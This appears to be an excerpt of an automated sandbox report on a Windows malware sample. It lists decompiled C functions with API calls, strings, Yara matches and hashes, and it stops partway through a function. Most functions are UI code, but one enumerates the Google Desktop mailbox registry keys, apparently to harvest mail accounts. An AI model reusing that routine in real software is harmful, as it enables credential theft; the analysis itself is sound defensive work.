                                                  • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                  • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                  • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                  • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                  				intOrPtr _v12;
                                                  				struct tagPOINT _v20;
                                                  				struct tagRECT _v36;
                                                  				int _t27;
                                                  				struct HWND__* _t30;
                                                  				struct HWND__* _t32;
                                                  
                                                  				_t30 = _a4;
                                                  				if((_a8 & 0x00000001) != 0) {
                                                  					_t32 = GetParent(_t30);
                                                  					GetWindowRect(_t30,  &_v20);
                                                  					GetClientRect(_t32,  &_v36);
                                                  					MapWindowPoints(0, _t32,  &_v20, 2);
                                                  					_t27 = _v36.right - _v12 - _v36.left;
                                                  					_v20.x = _t27;
                                                  					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                  				}
                                                  				if((_a8 & 0x00000002) != 0) {
                                                  					E00406560(_t30);
                                                  				}
                                                  				return 1;
                                                  			}


                                                  APIs
                                                  • GetParent.USER32(?), ref: 00407C0B
                                                  • GetWindowRect.USER32 ref: 00407C18
                                                  • GetClientRect.USER32 ref: 00407C23
                                                  • MapWindowPoints.USER32 ref: 00407C33
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                  • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                  • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                  • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040A4C8(void* __eax) {
                                                  				void* __esi;
                                                  				void* _t16;
                                                  				void* _t33;
                                                  				void* _t38;
                                                  				void* _t41;
                                                  
                                                  				_t41 = __eax;
                                                  				_t16 = E00401033();
                                                  				if(_t16 == 0x5cb8) {
                                                  					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
                                                  					E00405E2C();
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
                                                  					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
                                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
                                                  					E0040A437(_t41);
                                                  					SetCursor( *0x416b98);
                                                  					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
                                                  					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
                                                  				}
                                                  				return _t16;
                                                  			}


                                                  APIs
                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5
                                                    • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                    • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518
                                                    • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                    • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                    • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                    • Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                  • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                  • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                  • String ID:
                                                  • API String ID: 2210206837-0
                                                  • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                  • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                  • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                  • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				void _v515;
                                                  				char _v516;
                                                  				void* __esi;
                                                  				void* _t17;
                                                  				intOrPtr* _t26;
                                                  				char* _t28;
                                                  
                                                  				_t26 = __ecx;
                                                  				_v260 = 0;
                                                  				memset( &_v259, 0, 0xfe);
                                                  				_v516 = 0;
                                                  				memset( &_v515, 0, 0xfe);
                                                  				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
                                                  				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                                  				_t28 =  &_v260;
                                                  				E00409018(_t28, _t17);
                                                  				sprintf( &_v516, "<%s>\r\n", _t28);
                                                  				return E00405EFD(_a4,  &_v516);
                                                  			}


                                                  APIs
                                                  • memset.MSVCRT ref: 0040988A
                                                  • memset.MSVCRT ref: 004098A0
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                    • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                    • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                  • sprintf.MSVCRT ref: 004098D7
                                                  Strings
                                                  • <%s>, xrefs: 004098D1
                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                  • API String ID: 3202206310-1998499579
                                                  • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                  • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                  • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                  • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E00408572(void* __esi) {
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t10;
                                                  				intOrPtr _t11;
                                                  				intOrPtr* _t18;
                                                  				void* _t19;
                                                  
                                                  				_t19 = __esi;
                                                  				_t9 =  *((intOrPtr*)(__esi + 0x24));
                                                  				if(_t9 != 0) {
                                                  					_push(_t9);
                                                  					L004115D6();
                                                  				}
                                                  				_t10 =  *((intOrPtr*)(_t19 + 0x34));
                                                  				if(_t10 != 0) {
                                                  					_push(_t10);
                                                  					L004115D6();
                                                  				}
                                                  				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
                                                  				if(_t11 != 0) {
                                                  					_push(_t11);
                                                  					L004115D6();
                                                  				}
                                                  				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
                                                  				if(_t18 != 0) {
                                                  					_t11 =  *_t18;
                                                  					if(_t11 != 0) {
                                                  						_push(_t11);
                                                  						L004115D6();
                                                  						 *_t18 = 0;
                                                  					}
                                                  					_push(_t18);
                                                  					L004115D6();
                                                  				}
                                                  				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
                                                  				 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                  				 *((intOrPtr*)(_t19 + 0x34)) = 0;
                                                  				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
                                                  				return _t11;
                                                  			}


                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                  • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                  • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                  • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E004085D8(intOrPtr* __edi) {
                                                  				void* __esi;
                                                  				void** _t7;
                                                  				intOrPtr* _t12;
                                                  				intOrPtr* _t18;
                                                  				intOrPtr _t21;
                                                  				intOrPtr _t22;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t24;
                                                  
                                                  				_t18 = __edi;
                                                  				 *__edi = 0x413320;
                                                  				E00408572(__edi);
                                                  				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                                  				if(_t21 != 0) {
                                                  					E00406B5B(_t21);
                                                  					_push(_t21);
                                                  					L004115D6();
                                                  				}
                                                  				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                                  				if(_t22 != 0) {
                                                  					E00406B5B(_t22);
                                                  					_push(_t22);
                                                  					L004115D6();
                                                  				}
                                                  				_t23 =  *((intOrPtr*)(_t18 + 8));
                                                  				if(_t23 != 0) {
                                                  					E00406B5B(_t23);
                                                  					_push(_t23);
                                                  					L004115D6();
                                                  				}
                                                  				_t24 =  *((intOrPtr*)(_t18 + 4));
                                                  				if(_t24 != 0) {
                                                  					E00406B5B(_t24);
                                                  					_push(_t24);
                                                  					L004115D6();
                                                  				}
                                                  				_t12 = _t18;
                                                  				_t7 =  *((intOrPtr*)( *_t12))();
                                                  				free( *_t7);
                                                  				return _t7;
                                                  			}


                                                  APIs
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                  • free.MSVCRT(00000000), ref: 00408640
                                                    • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@$free
                                                  • String ID:
                                                  • API String ID: 2241099983-0
                                                  • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                  • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                  • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                  • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 19%
                                                  			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
                                                  				void* __esi;
                                                  				void* _t11;
                                                  				void* _t26;
                                                  				void* _t27;
                                                  
                                                  				_t26 = __edx;
                                                  				_t11 = _a4 - 0x110;
                                                  				_t27 = __ecx;
                                                  				if(_t11 == 0) {
                                                  					E0040E4A4(__ecx, __ecx, __eflags);
                                                  					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
                                                  					L5:
                                                  					return E004015AE(_t27, _a4, _a8, _a12);
                                                  				}
                                                  				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
                                                  					goto L5;
                                                  				} else {
                                                  					SetBkMode(_a8, 1);
                                                  					SetBkColor(_a8, GetSysColor(5));
                                                  					SetTextColor(_a8, 0xc00000);
                                                  					return GetSysColorBrush(5);
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                    • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                    • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                  • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                  • GetSysColor.USER32(00000005), ref: 0040E849
                                                  • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                  • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                  • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                  • String ID:
                                                  • API String ID: 1869857563-0
                                                  • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                  • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                  • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                  • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
                                                  				char _v265;
                                                  				char _v520;
                                                  				char _v532;
                                                  				RECT* _v540;
                                                  				char _v560;
                                                  				intOrPtr _v564;
                                                  				char _v568;
                                                  				intOrPtr _v572;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				int _t54;
                                                  				void* _t77;
                                                  				short _t85;
                                                  				short _t86;
                                                  				RECT* _t97;
                                                  				intOrPtr _t104;
                                                  
                                                  				_t93 = __ecx;
                                                  				_t97 = 0;
                                                  				_t104 = __ecx;
                                                  				_v564 = __ecx;
                                                  				if(_a4 == 0 || _a4 == 1) {
                                                  					_t85 = _a8;
                                                  					if(_t85 == 0x9c42) {
                                                  						_t54 = DestroyWindow( *(_t104 + 0x108));
                                                  					}
                                                  					_t114 = _t85 - 0x9c49;
                                                  					if(_t85 == 0x9c49) {
                                                  						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
                                                  					}
                                                  					_t115 = _t85 - 0x9c59;
                                                  					if(_t85 == 0x9c59) {
                                                  						_t54 = E0040AE70(_t97, _t104, _t115);
                                                  					}
                                                  					_t116 = _t85 - 0x9c56;
                                                  					if(_t85 == 0x9c56) {
                                                  						_t54 = E0040ADB3(_t104, _t116);
                                                  					}
                                                  					if(_a8 == 0x9c58) {
                                                  						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
                                                  						_t54 = E0040A27F(0, _t93, _t104, 0);
                                                  					}
                                                  					if(_a8 == 0x9c44) {
                                                  						_t54 = E0040AD9D(_t104);
                                                  					}
                                                  					if(_a8 == 0x9c43) {
                                                  						_v532 = 0x413560;
                                                  						E00401000(_t93,  &_v520, 0x412404);
                                                  						E00401000(_t93,  &_v265, 0x412440);
                                                  						_t104 = _v564;
                                                  						_push( *(_t104 + 0x108));
                                                  						_push( &_v532);
                                                  						_t77 = 0x70;
                                                  						E00401540(_t77);
                                                  						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                  						_t20 =  &_v540; // 0x413560
                                                  						_t54 = E0040143D(_t20);
                                                  						_t97 = 0;
                                                  					}
                                                  					_t86 = _a8;
                                                  					_t122 = _t86 - 0x9c41;
                                                  					if(_t86 == 0x9c41) {
                                                  						_t54 = E0040AD38(_t104, _t93, _t122);
                                                  					}
                                                  					if(_t86 != 0x9c47) {
                                                  						L23:
                                                  						__eflags = _t86 - 0x9c4f;
                                                  						if(_t86 != 0x9c4f) {
                                                  							L27:
                                                  							__eflags = _t86 - 0x9c48;
                                                  							if(_t86 == 0x9c48) {
                                                  								_t54 = E0040AC8A(_t104, _t86);
                                                  							}
                                                  							__eflags = _t86 - 0x9c45;
                                                  							if(__eflags == 0) {
                                                  								_t100 = _t104 + 0x36c;
                                                  								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
                                                  								E0040A27F(0, _t93, _t104, __eflags);
                                                  								_t93 = 1;
                                                  								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
                                                  								_t97 = 0;
                                                  								__eflags = 0;
                                                  							}
                                                  							__eflags = _a8 - 0x9c46;
                                                  							if(__eflags == 0) {
                                                  								_t54 = E0040B095(_t104, __eflags, _t97);
                                                  							}
                                                  							__eflags = _a8 - 0x9c5c;
                                                  							if(_a8 == 0x9c5c) {
                                                  								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
                                                  								__eflags = 0;
                                                  								E0040A27F(0, _t93, _t104, 0);
                                                  								E0040A437(_t104);
                                                  								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
                                                  							}
                                                  							__eflags = _a8 - 0x9c4a;
                                                  							if(__eflags == 0) {
                                                  								_t54 = E0040B095(_t104, __eflags, 1);
                                                  							}
                                                  							__eflags = _a8 - 0x9c4b;
                                                  							if(_a8 == 0x9c4b) {
                                                  								_v540 = _t97;
                                                  								_v560 = 0x412ff4;
                                                  								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                  								_v568 = 0x412ff4;
                                                  								_t54 = E0040143D( &_v560);
                                                  								_t104 = _v572;
                                                  							}
                                                  							__eflags = _a8 - 0x9c4c;
                                                  							if(_a8 == 0x9c4c) {
                                                  								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
                                                  							}
                                                  							__eflags = _a8 - 0x9c4e;
                                                  							if(_a8 == 0x9c4e) {
                                                  								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                  							}
                                                  							goto L43;
                                                  						}
                                                  						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                  						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                  						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                  							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
                                                  							goto L27;
                                                  						}
                                                  						_push(0xf000);
                                                  						_push(0x1000);
                                                  						goto L21;
                                                  					} else {
                                                  						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                  							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
                                                  							goto L23;
                                                  						}
                                                  						_push(0xf000);
                                                  						_push(0x2000);
                                                  						L21:
                                                  						_push(0xffffffff);
                                                  						_t54 = E00408654(_t72);
                                                  						goto L43;
                                                  					}
                                                  				} else {
                                                  					L43:
                                                  					return _t54;
                                                  				}
                                                  			}

                                                  APIs
                                                  • DestroyWindow.USER32(?), ref: 0040B13E
                                                  • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DestroyFocusInvalidateRectWindow
                                                  • String ID: `5A
                                                  • API String ID: 3502187192-343712130
                                                  • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                  • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                  • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                  • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				struct HDWP__* _v8;
                                                  				intOrPtr _v12;
                                                  				void* __ebx;
                                                  				intOrPtr _t29;
                                                  				struct HDWP__* _t30;
                                                  				RECT* _t58;
                                                  				intOrPtr _t66;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t66 = __ecx;
                                                  				_v12 = __ecx;
                                                  				if(_a4 != 5) {
                                                  					if(_a4 != 0x24) {
                                                  						if(_a4 == 0xf) {
                                                  							E0040173B(__ecx + 0xc);
                                                  						}
                                                  					} else {
                                                  						_t29 = _a12;
                                                  						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                  						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                  					}
                                                  				} else {
                                                  					_t30 = BeginDeferWindowPos(0xb);
                                                  					_t58 = _t66 + 0xc;
                                                  					_v8 = _t30;
                                                  					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
                                                  					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
                                                  					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
                                                  					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
                                                  					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
                                                  					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
                                                  					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
                                                  					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
                                                  					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
                                                  					E0040169B(_t58, _v8, 1, 1, 1, 0);
                                                  					E0040169B(_t58, _v8, 2, 1, 1, 0);
                                                  					EndDeferWindowPos(_v8);
                                                  					InvalidateRect( *(_t58 + 0x10), _t58, 1);
                                                  					_t66 = _v12;
                                                  				}
                                                  				return E004015AE(_t66, _a4, _a8, _a12);
                                                  			}

                                                  APIs
                                                  • BeginDeferWindowPos.USER32 ref: 00405D07
                                                    • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                    • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                    • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                  • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                  • String ID: $
                                                  • API String ID: 2498372239-3993045852
                                                  • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                  • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                  • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                  • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040719C(void* __ecx, intOrPtr _a4) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				char _v264;
                                                  				void* _v268;
                                                  				void* _v276;
                                                  				long _t17;
                                                  				void* _t21;
                                                  				void* _t24;
                                                  				void* _t29;
                                                  				int _t32;
                                                  				signed int _t36;
                                                  				void* _t39;
                                                  				void* _t40;
                                                  				void* _t41;
                                                  
                                                  				_t29 = __ecx;
                                                  				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
                                                  				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
                                                  				if(_t17 == 0) {
                                                  					_t32 = 0;
                                                  					_v260 = 0;
                                                  					memset( &_v259, 0, 0xff);
                                                  					_t40 = _t39 + 0xc;
                                                  					_t21 = E0040EC05(_v268, 0,  &_v260);
                                                  					while(1) {
                                                  						_t41 = _t40 + 0xc;
                                                  						if(_t21 != 0) {
                                                  							break;
                                                  						}
                                                  						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
                                                  						_t40 = _t41 + 0xc;
                                                  						if(_t24 == 0) {
                                                  							E0040706C(_t29, _a4, _v264,  &_v260);
                                                  							RegCloseKey(_v276);
                                                  						}
                                                  						_t32 = _t32 + 1;
                                                  						_t21 = E0040EC05(_v268, _t32,  &_v260);
                                                  					}
                                                  					_t17 = RegCloseKey(_v268);
                                                  				}
                                                  				return _t17;
                                                  			}
                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 004071D7
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                  Strings
                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: Close$EnumOpenmemset
                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                  • API String ID: 2255314230-2212045309
                                                  C-Code - Quality: 100%
                                                  			E0040B70A(void* __esi) {
                                                  				struct _WNDCLASSA _v44;
                                                  				struct HINSTANCE__* _t15;
                                                  				struct HWND__* _t20;
                                                  
                                                  				_t15 =  *0x416b94; // 0x400000
                                                  				_v44.hInstance = _t15;
